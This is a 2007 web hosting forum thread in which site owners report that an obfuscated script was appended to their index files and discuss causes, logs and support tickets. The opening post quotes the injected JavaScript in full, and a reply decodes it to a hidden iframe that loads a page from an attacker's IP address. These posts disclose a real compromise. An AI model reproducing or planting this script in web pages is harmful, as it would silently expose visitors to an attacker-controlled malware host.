Web Hosting Forum | Lunarpages
Topic: <script> appended to every index.*
bluejohn
« on: August 28, 2007, 11:17:12 PM »

All,

This morning I discovered that someone has appended the following script to every index.* on my server.

<script>function v46d4d0436053e(v46d4d04360d0d){ function v46d4d043614d2 () {var v46d4d04361ca4=16; return v46d4d04361ca4;} return(parseInt(v46d4d04360d0d,v46d4d043614d2()));}function v46d4d04362471(v46d4d04362c42){ var v46d4d043643c0=2; var v46d4d0436341a='';for(v46d4d04363beb=0; v46d4d04363beb<v46d4d04362c42.length; v46d4d04363beb+=v46d4d043643c0){ v46d4d0436341a+=(String.fromCharCode(v46d4d0436053e(v46d4d04362c42.substr(v46d4d04363beb, v46d4d043643c0))));}return v46d4d0436341a;} document.write(v46d4d04362471('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3862646232207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313032303834292B27633237316133645C272077696474683D313838206865696768743D353433207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

My server is hacked, I presume. Anyone discovered this as well?

Regards,
     Johan
bluejohn
« Reply #1 on: August 28, 2007, 11:35:38 PM »

If I escape the script (generated by this script) I get something like
%3CSCRIPT%3Ewindow.status%3D%27Done%27%3Bdocument.write%28%27%3Ciframe%20name%3D06%20src%3D%5C%27http%3A//58.65.235.153/%7Epozitive/ice/index.php%3F%27+Math.round%28Math.random%28%29*47430%29+%27558106f9d5%5C%27%20width%3D155%20height%3D306%20style%3D%5C%27display%3A%20none%5C%27%3E%3C/iframe%3E%27%29%3C/SCRIPT%3E

See http://groups.google.com/group/news.admin.net-abuse.email/browse_thread/thread/78ef83964dd2ec14/5de97e64e0aaf61b for someone reporting the same problem.

Anyone have any idea where my security hole is?

Johan
leighsww
« Reply #2 on: August 28, 2007, 11:40:45 PM »

I just checked the 3 accounts I take care of, and YES, so far I found that on ONE of the accounts' index.html pages. (I just renamed the index.html page so that it can't be executed.)

It's on my father's server, and it's weird because I put a blank index.html page for his site, since he only uses his server for private use for his company and clients (there's no website). I found that same code, just like the one you posted.

He's on Chara server. What server are you on?
leighsww
« Reply #3 on: August 28, 2007, 11:46:18 PM »

Okay, I checked other files on his server and it seems that the SMF forum that I installed for him has also been hacked with that code.

I had upgraded to the latest version of SMF 1.1.3 when it first came out, so there must be a vulnerability with SMF.

Do you have SMF installed on your site?

Anybody else using SMF, please check your index.php file and see if you also have that hack script.
bluejohn
« Reply #4 on: August 28, 2007, 11:47:31 PM »

I'm on aphelion.

Is this a major hack of lunarpages???

Johan

leighsww
« Reply #5 on: August 28, 2007, 11:50:17 PM »

I don't know. If you hadn't posted this, I wouldn't have known about it, so THANK YOU so much!!

I'm sure others will post as soon as they check their sites' files, as I'm sure we can't be the only ones.

I'm going to look at logs as soon as I'm finished checking all his files on the server to make sure nothing else was touched.

I renamed all the hacked files (I suggest you do the same).
« Last Edit: August 28, 2007, 11:51:55 PM by leighsww »
bluejohn
« Reply #6 on: August 28, 2007, 11:52:54 PM »

I don't know what the impact is. It could be that they've logged a lot of things, including some username/password combinations (e.g. when logging into a web-based email client).

I'm not using SMF, so it must be something else or not only SMF that has this vulnerability.

Regards,
    Johan
leighsww
« Reply #7 on: August 29, 2007, 12:03:33 AM »

Looks like this hack was just done today (at least for my dad's site), because the files that were touched had today's date on them. I hadn't touched my dad's server since early August, so I was able to spot the hacked files right away by the date.

Looks like only 2 files were hacked with that code on our server - "index.html" (a blank file in the root public_html) and "index.php" (for the SMF forum). No other file has a date change on it.

Gosh, if you hadn't spotted the hack today, who knows how long this might have stayed there unknowingly and what it would have done if executed. I really appreciate you posting this!!
leighsww
« Reply #8 on: August 29, 2007, 12:08:33 AM »

Quote
I'm not using SMF, so it must be something else or not only SMF that has this vulnerability.

Ah. Are you using php though?

I have to say though, this is kinda disturbing that SMF 1.1.3 has a vulnerability like this, because that's going to be what a lot of people are using here at LP. I don't have any mods installed for his forum, so it looks like the original bare-bones script has a security hole in it.

Well, I'm going to go look at the logs now to see if I can spot the IP address of the Hacker and any other info I can find.

Unfortunately, at this time of night, others won't see this thread until the morning due to their timezone.
leighsww
« Reply #9 on: August 29, 2007, 12:13:19 AM »

DANG, the last date the logs show on the server as being updated is 8/8/2007.

Why aren't cPanel's logs updating!!! Grr..!!

This makes it impossible now to find any data on what IP address hacked those files!
bluejohn
« Reply #10 on: August 29, 2007, 12:17:14 AM »

I already tried to look at my logs, but they were all deleted.
And the files were changed today, so it looks as if it's the same hack attempt.

Can you open a support ticket? I don't have access from where I'm using the internet.
leighsww
« Reply #11 on: August 29, 2007, 12:25:59 AM »

Yes, I'll put in a ticket and point them to this thread.
leighsww
« Reply #12 on: August 29, 2007, 12:39:13 AM »

Okay, this is frustrating, but I can't submit a support ticket!!

It won't accept my password, so I went through the "reset your password" route and it still won't let me in. I can't put in a support ticket!!

Has anyone else had this problem with putting in a support ticket? --> https://support.lunarpages.com/account/login
SteveW
« Reply #13 on: August 29, 2007, 12:40:00 AM »

Leigh, if your log hasn't been erased by the hacker, you can get it at cpanel > Raw Access Logs instead of cpanel > Raw Log Manager.

The fact that SMF's index.php was one of the hacked files doesn't mean that SMF has a hole. Any hack could have modified any file.

I checked my home page and SMF index.php, both ok so far, but haven't checked others yet.

I had a RFI hack attempt on the 26th from 83.18.159.125, in case that's any help. 

Quote
Is this a major hack of lunarpages???

It's probably automated and widespread. There's always crawlers running around trying to break into sites, but it's individual websites that would be vulnerable, not "Lunarpages". That would be extremely rare.

« Last Edit: August 29, 2007, 12:43:50 AM by SteveW »
leighsww
« Reply #14 on: August 29, 2007, 12:42:37 AM »

Quote
Leigh, if your log hasn't been erased by the hacker, you can get it at cpanel > Raw Access Logs instead of cpanel > Raw Log Manager.

I access my logs via FTP. I go straight to the "logs" folder outside the public_html. The files haven't been updated since 8/8/2007. This has happened before on my other server and I had to have somebody reset the server to get the logs to update.